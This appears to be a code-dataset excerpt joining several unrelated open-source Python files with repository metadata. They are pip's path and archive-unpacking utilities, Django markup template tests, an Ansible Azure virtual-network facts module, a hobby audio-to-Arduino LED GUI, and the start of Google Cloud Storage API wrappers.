if not os.path.isdir(path):
return False
setup_py = os.path.join(path, 'setup.py')
if os.path.isfile(setup_py):
return True
return False
def is_svn_page(html):
"""Returns true if the page appears to be the index page of an svn repository"""
return (re.search(r'<title>[^<]*Revision \d+:', html)
and re.search(r'Powered by (?:<a[^>]*?>)?Subversion', html, re.I))
def file_contents(filename):
fp = open(filename, 'rb')
try:
return fp.read().decode('utf-8')
finally:
fp.close()
def split_leading_dir(path):
path = str(path)
path = path.lstrip('/').lstrip('\\')
if '/' in path and (('\\' in path and path.find('/') < path.find('\\'))
or '\\' not in path):
return path.split('/', 1)
elif '\\' in path:
return path.split('\\', 1)
else:
return path, ''
def has_leading_dir(paths):
"""Returns true if all the paths have the same leading path name
(i.e., everything is in one subdirectory in an archive)"""
common_prefix = None
for path in paths:
prefix, rest = split_leading_dir(path)
if not prefix:
return False
elif common_prefix is None:
common_prefix = prefix
elif prefix != common_prefix:
return False
return True
def make_path_relative(path, rel_to):
"""
Make a filename relative, where the filename path, and it is
relative to rel_to
>>> make_relative_path('/usr/share/something/a-file.pth',
... '/usr/share/another-place/src/Directory')
'../../../something/a-file.pth'
>>> make_relative_path('/usr/share/something/a-file.pth',
... '/home/user/src/Directory')
'../../../usr/share/something/a-file.pth'
>>> make_relative_path('/usr/share/a-file.pth', '/usr/share/')
'a-file.pth'
"""
path_filename = os.path.basename(path)
path = os.path.dirname(path)
path = os.path.normpath(os.path.abspath(path))
rel_to = os.path.normpath(os.path.abspath(rel_to))
path_parts = path.strip(os.path.sep).split(os.path.sep)
rel_to_parts = rel_to.strip(os.path.sep).split(os.path.sep)
while path_parts and rel_to_parts and path_parts[0] == rel_to_parts[0]:
path_parts.pop(0)
rel_to_parts.pop(0)
full_parts = ['..']*len(rel_to_parts) + path_parts + [path_filename]
if full_parts == ['']:
return '.' + os.path.sep
return os.path.sep.join(full_parts)
def normalize_path(path):
"""
Convert a path to its canonical, case-normalized, absolute version.
"""
return os.path.normcase(os.path.realpath(os.path.expanduser(path)))
def splitext(path):
"""Like os.path.splitext, but take off .tar too"""
base, ext = posixpath.splitext(path)
if base.lower().endswith('.tar'):
ext = base[-4:] + ext
base = base[:-4]
return base, ext
def renames(old, new):
"""Like os.renames(), but handles renaming across devices."""
# Implementation borrowed from os.renames().
head, tail = os.path.split(new)
if head and tail and not os.path.exists(head):
os.makedirs(head)
shutil.move(old, new)
head, tail = os.path.split(old)
if head and tail:
try:
os.removedirs(head)
except OSError:
pass
def is_local(path):
"""
Return True if path is within sys.prefix, if we're running in a virtualenv.
If we're not in a virtualenv, all paths are considered "local."
"""
if not running_under_virtualenv():
return True
return normalize_path(path).startswith(normalize_path(sys.prefix))
def dist_is_local(dist):
"""
Return True if given Distribution object is installed locally
(i.e. within current virtualenv).
Always True if we're not in a virtualenv.
"""
return is_local(dist_location(dist))
def dist_in_usersite(dist):
"""
Return True if given Distribution is installed in user site.
"""
if user_site:
return normalize_path(dist_location(dist)).startswith(normalize_path(user_site))
else:
return False
def dist_in_site_packages(dist):
"""
Return True if given Distribution is installed in distutils.sysconfig.get_python_lib().
"""
return normalize_path(dist_location(dist)).startswith(normalize_path(site_packages))
def dist_is_editable(dist):
"""Is distribution an editable install?"""
#TODO: factor out determining editableness out of FrozenRequirement
from pip import FrozenRequirement
req = FrozenRequirement.from_dist(dist, [])
return req.editable
def get_installed_distributions(local_only=True,
skip=('setuptools', 'pip', 'python', 'distribute'),
include_editables=True,
editables_only=False):
"""
Return a list of installed Distribution objects.
If ``local_only`` is True (default), only return installations
local to the current virtualenv, if in a virtualenv.
``skip`` argument is an iterable of lower-case project names to
ignore; defaults to ('setuptools', 'pip', 'python'). [FIXME also
skip virtualenv?]
If ``editables`` is False, don't report editables.
If ``editables_only`` is True , only report editables.
"""
if local_only:
local_test = dist_is_local
else:
local_test = lambda d: True
if include_editables:
editable_test = lambda d: True
else:
editable_test = lambda d: not dist_is_editable(d)
if editables_only:
editables_only_test = lambda d: dist_is_editable(d)
else:
editables_only_test = lambda d: True
return [d for d in pkg_resources.working_set
if local_test(d)
and d.key not in skip
and editable_test(d)
and editables_only_test(d)
]
def egg_link_path(dist):
"""
Return the path for the .egg-link file if it exists, otherwise, None.
There's 3 scenarios:
1) not in a virtualenv
try to find in site.USER_SITE, then site_packages
2) in a no-global virtualenv
try to find in site_packages
3) in a yes-global virtualenv
try to find in site_packages, then site.USER_SITE (don't look in global location)
For #1 and #3, there could be odd cases, where there's an egg-link in 2 locations.
This method will just return the first one found.
"""
sites = []
if running_under_virtualenv():
if virtualenv_no_global():
sites.append(site_packages)
else:
sites.append(site_packages)
if user_site:
sites.append(user_site)
else:
if user_site:
sites.append(user_site)
sites.append(site_packages)
for site in sites:
egglink = os.path.join(site, dist.project_name) + '.egg-link'
if os.path.isfile(egglink):
return egglink
def dist_location(dist):
"""
Get the site-packages location of this distribution. Generally
this is dist.location, except in the case of develop-installed
packages, where dist.location is the source code location, and we
want to know where the egg-link file is.
"""
egg_link = egg_link_path(dist)
if egg_link:
return egg_link
return dist.location
def get_terminal_size():
"""Returns a tuple (x, y) representing the width(x) and the height(x)
in characters of the terminal window."""
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
import struct
cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,
'1234'))
except:
return None
if cr == (0, 0):
return None
if cr == (0, 0):
return None
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
cr = (os.environ.get('LINES', 25), os.environ.get('COLUMNS', 80))
return int(cr[1]), int(cr[0])
def current_umask():
"""Get the current umask which involves having to set it temporarily."""
mask = os.umask(0)
os.umask(mask)
return mask
def unzip_file(filename, location, flatten=True):
"""
Unzip the file (with path `filename`) to the destination `location`. All
files are written based on system defaults and umask (i.e. permissions are
not preserved), except that regular file members with any execute
permissions (user, group, or world) have "chmod +x" applied after being
written. Note that for windows, any execute changes using os.chmod are
no-ops per the python docs.
"""
if not os.path.exists(location):
os.makedirs(location)
zipfp = open(filename, 'rb')
try:
zip = zipfile.ZipFile(zipfp)
leading = has_leading_dir(zip.namelist()) and flatten
for info in zip.infolist():
name = info.filename
data = zip.read(name)
fn = name
if leading:
fn = split_leading_dir(name)[1]
fn = os.path.join(location, fn)
dir = os.path.dirname(fn)
if not os.path.exists(dir):
os.makedirs(dir)
if fn.endswith('/') or fn.endswith('\\'):
# A directory
if not os.path.exists(fn):
os.makedirs(fn)
else:
fp = open(fn, 'wb')
try:
fp.write(data)
finally:
fp.close()
mode = info.external_attr >> 16
# if mode and regular file and any execute permissions for user/group/world?
if mode and stat.S_ISREG(mode) and mode & 0o111:
# make dest file have execute for user/group/world (chmod +x)
# no-op on windows per python docs
os.chmod(fn, (0o777-current_umask() | 0o111))
finally:
zipfp.close()
def untar_file(filename, location):
"""
Untar the file (with path `filename`) to the destination `location`.
All files are written based on system defaults and umask (i.e. permissions
are not preserved), except that regular file members with any execute
permissions (user, group, or world) have "chmod +x" applied after being
written. Note that for windows, any execute changes using os.chmod are
no-ops per the python docs.
"""
if not os.path.exists(location):
os.makedirs(location)
if filename.lower().endswith('.gz') or filename.lower().endswith('.tgz'):
mode = 'r:gz'
elif filename.lower().endswith('.bz2') or filename.lower().endswith('.tbz'):
mode = 'r:bz2'
elif filename.lower().endswith('.tar'):
mode = 'r'
else:
logger.warn('Cannot determine compression type for file %s' % filename)
mode = 'r:*'
tar = tarfile.open(filename, mode)
try:
# note: python<=2.5 doesnt seem to know about pax headers, filter them
leading = has_leading_dir([
member.name for member in tar.getmembers()
if member.name != 'pax_global_header'
])
for member in tar.getmembers():
fn = member.name
if fn == 'pax_global_header':
continue
if leading:
fn = split_leading_dir(fn)[1]
path = os.path.join(location, fn)
if member.isdir():
if not os.path.exists(path):
os.makedirs(path)
elif member.issym():
try:
tar._extract_member(member, path)
except:
e = sys.exc_info()[1]
# Some corrupt tar files seem to produce this
# (specifically bad symlinks)
logger.warn(
'In the tar file %s the member %s is invalid: %s'
% (filename, member.name, e))
continue
else:
try:
fp = tar.extractfile(member)
except (KeyError, AttributeError):
e = sys.exc_info()[1]
# Some corrupt tar files seem to produce this
# (specifically bad symlinks)
logger.warn(
'In the tar file %s the member %s is invalid: %s'
% (filename, member.name, e))
continue
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
destfp = open(path, 'wb')
try:
shutil.copyfileobj(fp, destfp)
finally:
destfp.close()
fp.close()
# member have any execute permissions for user/group/world?
if member.mode & 0o111:
# make dest file have execute for user/group/world
# no-op on windows per python docs
os.chmod(path, (0o777-current_umask() | 0o111))
finally:
tar.close()
def create_download_cache_folder(folder):
logger.indent -= 2
logger.notify('Creating supposed download cache at %s' % folder)
logger.indent += 2
os.makedirs(folder)
def cache_download(target_file, temp_location, content_type):
logger.notify('Storing download in cache at %s' % display_path(target_file))
shutil.copyfile(temp_location, target_file)
fp = open(target_file+'.content-type', 'w')
fp.write(content_type)
fp.close()
def unpack_file(filename, location, content_type, link):
filename = os.path.realpath(filename)
if (content_type == 'application/zip'
or filename.endswith('.zip')
or filename.endswith('.pybundle')
or filename.endswith('.whl')
or zipfile.is_zipfile(filename)):
unzip_file(filename, location, flatten=not filename.endswith(('.pybundle', '.whl')))
elif (content_type == 'application/x-gzip'
or tarfile.is_tarfile(filename)
or splitext(filename)[1].lower() in ('.tar', '.tar.gz', '.tar.bz2', '.tgz', '.tbz')):
untar_file(filename, location)
elif (content_type and content_type.startswith('text/html')
and is_svn_page(file_contents(filename))):
# We don't really care about this
from pip.vcs.subversion import Subversion
Subversion('svn+' + link.url).unpack(location)
else:
## FIXME: handle?
## FIXME: magic signatures?
logger.fatal('Cannot unpack file %s (downloaded from %s, content-type: %s); cannot detect archive format'
% (filename, location, content_type))
raise InstallationError('Cannot determine archive format of %s' % location)
def call_subprocess(cmd, show_stdout=True,
filter_stdout=None, cwd=None,
raise_on_returncode=True,
command_level=logger.DEBUG, command_desc=None,
extra_environ=None):
if command_desc is None:
cmd_parts = []
for part in cmd:
if ' ' in part or '\n' in part or '"' in part or "'" in part:
part = '"%s"' % part.replace('"', '\\"')
cmd_parts.append(part)
command_desc = ' '.join(cmd_parts)
if show_stdout:
stdout = None
else:
stdout = subprocess.PIPE
logger.log(command_level, "Running command %s" % command_desc)
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
try:
proc = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
cwd=cwd, env=env)
except Exception:
e = sys.exc_info()[1]
logger.fatal(
"Error %s while executing command %s" % (e, command_desc))
raise
all_output = []
if stdout is not None:
stdout = proc.stdout
while 1:
line = console_to_str(stdout.readline())
if not line:
break
line = line.rstrip()
all_output.append(line + '\n')
if filter_stdout:
level = filter_stdout(line)
if isinstance(level, tuple):
level, line = level
logger.log(level, line)
if not logger.stdout_level_matches(level):
logger.show_progress()
else:
logger.info(line)
else:
returned_stdout, returned_stderr = proc.communicate()
all_output = [returned_stdout or '']
proc.wait()
if proc.returncode:
if raise_on_returncode:
if all_output:
logger.notify('Complete output from command %s:' % command_desc)
logger.notify('\n'.join(all_output) + '\n----------------------------------------')
raise InstallationError(
"Command %s failed with error code %s in %s"
% (command_desc, proc.returncode, cwd))
else:
logger.warn(
"Command %s had error code %s in %s"
% (command_desc, proc.returncode, cwd))
if stdout is not None:
return ''.join(all_output)
def is_prerelease(vers):
"""
Attempt to determine if this is a pre-release using PEP386/PEP426 rules.
Will return True if it is a pre-release and False if not. Versions are
assumed to be a pre-release if they cannot be parsed.
"""
normalized = version._suggest_normalized_version(vers)
if normalized is None:
# Cannot normalize, assume it is a pre-release
return True
parsed = version._normalized_key(normalized)
return any([any([y in set(["a", "b", "c", "rc", "dev"]) for y in x]) for x in parsed])
|
mit
|
gnuhub/intellij-community
|
python/lib/Lib/site-packages/django/contrib/markup/tests.py
|
245
|
3155
|
# Quick tests for the markup templatetags (django.contrib.markup)
import re
from django.template import Template, Context, add_to_builtins
from django.utils import unittest
from django.utils.html import escape
add_to_builtins('django.contrib.markup.templatetags.markup')
try:
import textile
except ImportError:
textile = None
try:
import markdown
except ImportError:
markdown = None
try:
import docutils
except ImportError:
docutils = None
class Templates(unittest.TestCase):
textile_content = """Paragraph 1
Paragraph 2 with "quotes" and @code@"""
markdown_content = """Paragraph 1
## An h2"""
rest_content = """Paragraph 1
Paragraph 2 with a link_
.. _link: http://www.example.com/"""
@unittest.skipUnless(textile, 'texttile not installed')
def test_textile(self):
t = Template("{{ textile_content|textile }}")
rendered = t.render(Context({'textile_content':self.textile_content})).strip()
self.assertEqual(rendered.replace('\t', ''), """<p>Paragraph 1</p>
<p>Paragraph 2 with “quotes” and <code>code</code></p>""")
@unittest.skipIf(textile, 'texttile is installed')
def test_no_textile(self):
t = Template("{{ textile_content|textile }}")
rendered = t.render(Context({'textile_content':self.textile_content})).strip()
self.assertEqual(rendered, escape(self.textile_content))
@unittest.skipUnless(markdown, 'markdown not installed')
def test_markdown(self):
t = Template("{{ markdown_content|markdown }}")
rendered = t.render(Context({'markdown_content':self.markdown_content})).strip()
pattern = re.compile("""<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>""")
self.assertTrue(pattern.match(rendered))
@unittest.skipIf(markdown, 'markdown is installed')
def test_no_markdown(self):
t = Template("{{ markdown_content|markdown }}")
rendered = t.render(Context({'markdown_content':self.markdown_content})).strip()
self.assertEqual(rendered, self.markdown_content)
@unittest.skipUnless(docutils, 'docutils not installed')
def test_docutils(self):
t = Template("{{ rest_content|restructuredtext }}")
rendered = t.render(Context({'rest_content':self.rest_content})).strip()
# Different versions of docutils return slightly different HTML
try:
# Docutils v0.4 and earlier
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with a <a class="reference" href="http://www.example.com/">link</a></p>""")
except AssertionError, e:
# Docutils from SVN (which will become 0.5)
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with a <a class="reference external" href="http://www.example.com/">link</a></p>""")
@unittest.skipIf(docutils, 'docutils is installed')
def test_no_docutils(self):
t = Template("{{ rest_content|restructuredtext }}")
rendered = t.render(Context({'rest_content':self.rest_content})).strip()
self.assertEqual(rendered, self.rest_content)
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
fredericlepied/ansible
|
lib/ansible/modules/cloud/azure/azure_rm_virtualnetwork_facts.py
|
8
|
5361
|
#!/usr/bin/python
#
# Copyright (c) 2016 Matt Davis, <[email protected]>
# Chris Houseknecht, <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'curated'}
DOCUMENTATION = '''
---
module: azure_rm_virtualnetwork_facts
version_added: "2.1"
short_description: Get virtual network facts.
description:
- Get facts for a specific virtual network or all virtual networks within a resource group.
options:
name:
description:
- Only show results for a specific security group.
default: null
required: false
resource_group:
description:
- Limit results by resource group. Required when filtering by name.
default: null
required: false
tags:
description:
- Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.
default: null
required: false
extends_documentation_fragment:
- azure
author:
- "Chris Houseknecht [email protected]"
- "Matt Davis [email protected]"
'''
EXAMPLES = '''
- name: Get facts for one virtual network
azure_rm_virtualnetwork_facts:
resource_group: Testing
name: secgroup001
- name: Get facts for all virtual networks
azure_rm_virtualnetwork_facts:
resource_group: Testing
- name: Get facts by tags
azure_rm_virtualnetwork_facts:
tags:
- testing
'''
RETURN = '''
azure_virtualnetworks:
description: List of virtual network dicts.
returned: always
type: list
example: [{
"etag": 'W/"532ba1be-ae71-40f2-9232-3b1d9cf5e37e"',
"id": "/subscriptions/XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX/resourceGroups/Testing/providers/Microsoft.Network/virtualNetworks/vnet2001",
"location": "eastus2",
"name": "vnet2001",
"properties": {
"addressSpace": {
"addressPrefixes": [
"10.10.0.0/16"
]
},
"provisioningState": "Succeeded",
"resourceGuid": "a7ba285f-f7e7-4e17-992a-de4d39f28612",
"subnets": []
},
"type": "Microsoft.Network/virtualNetworks"
}]
'''
try:
from msrestazure.azure_exceptions import CloudError
from azure.common import AzureMissingResourceHttpError, AzureHttpError
except:
# This is handled in azure_rm_common
pass
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
AZURE_OBJECT_CLASS = 'VirtualNetwork'
class AzureRMNetworkInterfaceFacts(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list'),
)
self.results = dict(
changed=False,
ansible_facts=dict(azure_virtualnetworks=[])
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMNetworkInterfaceFacts, self).__init__(self.module_arg_spec,
supports_tags=False,
facts_module=True)
def exec_module(self, **kwargs):
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if self.name is not None:
self.results['ansible_facts']['azure_virtualnetworks'] = self.get_item()
else:
self.results['ansible_facts']['azure_virtualnetworks'] = self.list_items()
return self.results
def get_item(self):
self.log('Get properties for {0}'.format(self.name))
item = None
results = []
try:
item = self.network_client.virtual_networks.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
results = [self.serialize_obj(item, AZURE_OBJECT_CLASS)]
return results
def list_resource_group(self):
self.log('List items for resource group')
try:
response = self.network_client.virtual_networks.list(self.resource_group)
except AzureHttpError as exc:
self.fail("Failed to list for resource group {0} - {1}".format(self.resource_group, str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def list_items(self):
self.log('List all for items')
try:
response = self.network_client.virtual_networks.list_all()
except AzureHttpError as exc:
self.fail("Failed to list all items - {0}".format(str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def main():
AzureRMNetworkInterfaceFacts()
if __name__ == '__main__':
main()
|
gpl-3.0
|
gfvandehei/roomlight-6
|
light_GUI.py
|
1
|
3827
|
import pyaudio
import numpy as np
import threading
import serial
from tkinter import *
import serial
class GUI(Frame):
def audio_thread(self):
'''
This function is in charge of collecting data from microphone
and changing it into usable data. Is meant to be ran as a thread
so it does not obstruct the GUI
'''
self.audio_exit=False
CHUNK = 2**11
RATE = 44100
p=pyaudio.PyAudio()
stream=p.open(format=pyaudio.paInt16,channels=1,rate=RATE,input=True,
frames_per_buffer=CHUNK)
while(self.audio_exit==False):
data = np.fromstring(stream.read(CHUNK),dtype=np.int16)
peak=np.average(np.abs(data))*2
bars="#"*int(50*peak/2**16)
henlo=int(50*peak/2**14)
henlo2=str(henlo)
try:
#print("THIS IS IT",bytes(henlo2,"utf-8"))
self.ser.write(bytes(henlo2+'\n',"utf-8"))
#print(self.ser.read())
except:
print("NUT")
stream.stop_stream()
stream.close()
p.terminate()
def audio_command(self):
'''
this function is in charge of controlling the audio visualizer thread
should be called by clicking the audio visualizer button
'''
self.visualthread=threading.Thread(target=self.audio_thread)
self.visualthread.start()
def reset_command(self):
'''
this is the function for the reset button, resets the
'''
self.audio_exit=not self.audio_exit
print(self.audio_exit)
def createWidgets(self):
self.reset_button=Button(text="reset", command=self.reset_command)
self.lightdisplay=Message(width=300,text="-"*72)
self.redval=Spinbox(from_=0,to=255)#begin row 1
self.greenval=Spinbox(from_=0,to=255)
self.blueval=Spinbox(from_=0,to=255)
self.LEDSelector=Spinbox(from_=0,to=self.LEDNUM)
self.colorEnter=Button(text="Display")#end row 1
self.TimerIn=Entry()#begin row 2
self.TimerCheck=Button(text="Start")#row 3
self.AudioVisualizer=Button(text="Audio Visualizer",command=self.audio_command)#row 4
self.weather=Button(text="Weather")
self.screen=Button(text="Audio Visualizer")
self.TBD1=Button(text="Audio Visualizer")
self.TBD2=Button(text="Audio Visualizer")
#pack row 1
self.lightdisplay.grid(row=0)
self.reset_button.grid(row=1, column=3)
self.redval.grid(row=2,column=0)
self.greenval.grid(row=3, column=0)
self.blueval.grid(row=4,column=0)
self.colorEnter.grid(row=5,column=0)
self.TimerIn.grid(row=2,column=1)
self.TimerCheck.grid(row=2,column=2)
self.AudioVisualizer.grid(row=2,column=3)
self.weather.grid(row=2,column=3)
self.weather.grid(row=3,column=3)
self.screen.grid(row=4,column=3)
self.TBD1.grid(row=5,column=3)
self.TBD2.grid(row=6,column=3)
#end pack
def __init__(self, master=None):
self.audio_exit=False
Frame.__init__(self, master)
self.LEDNUM=0
if(sys.platform=="linux"):
try:
self.ser=serial.Serial("/dev/tty.usbserial",9600)
except:
print("could not connect (linux)")
else:
try:
self.ser=serial.Serial("COM5",9600)
except:
print("could not connect (Windows)")
self.createWidgets()
if __name__=="__main__":
root=Tk()
try:
ser=serial.Serial("COM5",9600)
except:
print("could not find arduino on COM5, check connection")
mainWindow=GUI(master=root)
mainWindow.mainloop()
|
mit
|
kubernetes/test-infra
|
gubernator/third_party/cloudstorage/storage_api.py
|
75
|
28161
|
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Python wrappers for the Google Storage RESTful API."""
__all__ = ['ReadBuffer',
'StreamingBuffer',
]
import collections
import os
import urlparse
from . import api_utils
from . import common
from . import errors
from . import rest_api
try:
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
except ImportError:
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
def _get_storage_api(retry_params, account_id=None):
"""Returns storage_api instance for API methods.
Args:
retry_params: An instance of api_utils.RetryParams. If none,
thread's default will be used.
account_id: Internal-use only.
Returns:
A storage_api instance to handle urlfetch work to GCS.
On dev appserver, this instance by default will talk to a local stub
unless common.ACCESS_TOKEN is set. That token will be used to talk
to the real GCS.
"""
api = _StorageApi(_StorageApi.full_control_scope,
service_account_id=account_id,
retry_params=retry_params)
if common.local_run() and not common.get_access_token():
api.api_url = common.local_api_url()
if common.get_access_token():
api.token = common.get_access_token()
return api
class _StorageApi(rest_api._RestApi):
"""A simple wrapper for the Google Storage RESTful API.
WARNING: Do NOT directly use this api. It's an implementation detail
and is subject to change at any release.
All async methods have similar args and returns.
Args:
path: The path to the Google Storage object or bucket, e.g.
'/mybucket/myfile' or '/mybucket'.
**kwd: Options for urlfetch. e.g.
headers={'content-type': 'text/plain'}, payload='blah'.
Returns:
A ndb Future. When fulfilled, future.get_result() should return
a tuple of (status, headers, content) that represents a HTTP response
of Google Cloud Storage XML API.
"""
api_url = 'https://storage.googleapis.com'
read_only_scope = 'https://www.googleapis.com/auth/devstorage.read_only'
read_write_scope = 'https://www.googleapis.com/auth/devstorage.read_write'
full_control_scope = 'https://www.googleapis.com/auth/devstorage.full_control'
def __getstate__(self):
"""Store state as part of serialization/pickling.
Returns:
A tuple (of dictionaries) with the state of this object
"""
return (super(_StorageApi, self).__getstate__(), {'api_url': self.api_url})
def __setstate__(self, state):
"""Restore state as part of deserialization/unpickling.
Args:
state: the tuple from a __getstate__ call
"""
superstate, localstate = state
super(_StorageApi, self).__setstate__(superstate)
self.api_url = localstate['api_url']
@api_utils._eager_tasklet
@ndb.tasklet
def do_request_async(self, url, method='GET', headers=None, payload=None,
deadline=None, callback=None):
"""Inherit docs.
This method translates urlfetch exceptions to more service specific ones.
"""
if headers is None:
headers = {}
if 'x-goog-api-version' not in headers:
headers['x-goog-api-version'] = '2'
headers['accept-encoding'] = 'gzip, *'
try:
resp_tuple = yield super(_StorageApi, self).do_request_async(
url, method=method, headers=headers, payload=payload,
deadline=deadline, callback=callback)
except urlfetch.DownloadError, e:
raise errors.TimeoutError(
'Request to Google Cloud Storage timed out.', e)
raise ndb.Return(resp_tuple)
def post_object_async(self, path, **kwds):
"""POST to an object."""
return self.do_request_async(self.api_url + path, 'POST', **kwds)
def put_object_async(self, path, **kwds):
"""PUT an object."""
return self.do_request_async(self.api_url + path, 'PUT', **kwds)
def get_object_async(self, path, **kwds):
"""GET an object.
Note: No payload argument is supported.
"""
return self.do_request_async(self.api_url + path, 'GET', **kwds)
def delete_object_async(self, path, **kwds):
"""DELETE an object.
Note: No payload argument is supported.
"""
return self.do_request_async(self.api_url + path, 'DELETE', **kwds)
def head_object_async(self, path, **kwds):
"""HEAD an object.
Depending on request headers, HEAD returns various object properties,
e.g. Content-Length, Last-Modified, and ETag.
Note: No payload argument is supported.
"""
return self.do_request_async(self.api_url + path, 'HEAD', **kwds)
def get_bucket_async(self, path, **kwds):
"""GET a bucket."""
return self.do_request_async(self.api_url + path, 'GET', **kwds)
def compose_object(self, file_list, destination_file, content_type):
"""COMPOSE multiple objects together.
Using the given list of files, calls the put object with the compose flag.
This call merges all the files into the destination file.
Args:
file_list: list of dicts with the file name.
destination_file: Path to the destination file.
content_type: Content type for the destination file.
"""
xml_setting_list = ['<ComposeRequest>']
for meta_data in file_list:
xml_setting_list.append('<Component>')
for key, val in meta_data.iteritems():
xml_setting_list.append('<%s>%s</%s>' % (key, val, key))
xml_setting_list.append('</Component>')
xml_setting_list.append('</ComposeRequest>')
xml = ''.join(xml_setting_list)
if content_type is not None:
headers = {'Content-Type': content_type}
else:
headers = None
status, resp_headers, content = self.put_object(
api_utils._quote_filename(destination_file) + '?compose',
payload=xml,
headers=headers)
errors.check_status(status, [200], destination_file, resp_headers,
body=content)
_StorageApi = rest_api.add_sync_methods(_StorageApi)
class ReadBuffer(object):
"""A class for reading Google storage files."""
DEFAULT_BUFFER_SIZE = 1024 * 1024
MAX_REQUEST_SIZE = 30 * DEFAULT_BUFFER_SIZE
def __init__(self,
api,
path,
buffer_size=DEFAULT_BUFFER_SIZE,
max_request_size=MAX_REQUEST_SIZE,
offset=0):
"""Constructor.
Args:
api: A StorageApi instance.
path: Quoted/escaped path to the object, e.g. /mybucket/myfile
buffer_size: buffer size. The ReadBuffer keeps
one buffer. But there may be a pending future that contains
a second buffer. This size must be less than max_request_size.
max_request_size: Max bytes to request in one urlfetch.
offset: Number of bytes to skip at the start of the file. If None, 0 is
used.
"""
self._api = api
self._path = path
self.name = api_utils._unquote_filename(path)
self.closed = False
assert buffer_size <= max_request_size
self._buffer_size = buffer_size
self._max_request_size = max_request_size
self._offset = offset
self._buffer = _Buffer()
self._etag = None
get_future = self._get_segment(offset, self._buffer_size, check_response=False)
status, headers, content = self._api.head_object(path)
errors.check_status(status, [200], path, resp_headers=headers, body=content)
self._file_size = long(common.get_stored_content_length(headers))
self._check_etag(headers.get('etag'))
self._buffer_future = None
if self._file_size != 0:
content, check_response_closure = get_future.get_result()
check_response_closure()
self._buffer.reset(content)
self._request_next_buffer()
def __getstate__(self):
"""Store state as part of serialization/pickling.
The contents of the read buffer are not stored, only the current offset for
data read by the client. A new read buffer is established at unpickling.
The head information for the object (file size and etag) are stored to
reduce startup and ensure the file has not changed.
Returns:
A dictionary with the state of this object
"""
return {'api': self._api,
'path': self._path,
'buffer_size': self._buffer_size,
'request_size': self._max_request_size,
'etag': self._etag,
'size': self._file_size,
'offset': self._offset,
'closed': self.closed}
def __setstate__(self, state):
"""Restore state as part of deserialization/unpickling.
Args:
state: the dictionary from a __getstate__ call
Along with restoring the state, pre-fetch the next read buffer.
"""
self._api = state['api']
self._path = state['path']
self.name = api_utils._unquote_filename(self._path)
self._buffer_size = state['buffer_size']
self._max_request_size = state['request_size']
self._etag = state['etag']
self._file_size = state['size']
self._offset = state['offset']
self._buffer = _Buffer()
self.closed = state['closed']
self._buffer_future = None
if self._remaining() and not self.closed:
self._request_next_buffer()
def __iter__(self):
"""Iterator interface.
Note the ReadBuffer container itself is the iterator. It's
(quote PEP0234)
'destructive: they consumes all the values and a second iterator
cannot easily be created that iterates independently over the same values.
You could open the file for the second time, or seek() to the beginning.'
Returns:
Self.
"""
return self
def next(self):
line = self.readline()
if not line:
raise StopIteration()
return line
def readline(self, size=-1):
"""Read one line delimited by '\n' from the file.
A trailing newline character is kept in the string. It may be absent when a
file ends with an incomplete line. If the size argument is non-negative,
it specifies the maximum string size (counting the newline) to return.
A negative size is the same as unspecified. Empty string is returned
only when EOF is encountered immediately.
Args:
size: Maximum number of bytes to read. If not specified, readline stops
only on '\n' or EOF.
Returns:
The data read as a string.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
if size == 0 or not self._remaining():
return ''
data_list = []
newline_offset = self._buffer.find_newline(size)
while newline_offset < 0:
data = self._buffer.read(size)
size -= len(data)
self._offset += len(data)
data_list.append(data)
if size == 0 or not self._remaining():
return ''.join(data_list)
self._buffer.reset(self._buffer_future.get_result())
self._request_next_buffer()
newline_offset = self._buffer.find_newline(size)
data = self._buffer.read_to_offset(newline_offset + 1)
self._offset += len(data)
data_list.append(data)
return ''.join(data_list)
def read(self, size=-1):
"""Read data from RAW file.
Args:
size: Number of bytes to read as integer. Actual number of bytes
read is always equal to size unless EOF is reached. If size is
negative or unspecified, read the entire file.
Returns:
data read as str.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
if not self._remaining():
return ''
data_list = []
while True:
remaining = self._buffer.remaining()
if size >= 0 and size < remaining:
data_list.append(self._buffer.read(size))
self._offset += size
break
else:
size -= remaining
self._offset += remaining
data_list.append(self._buffer.read())
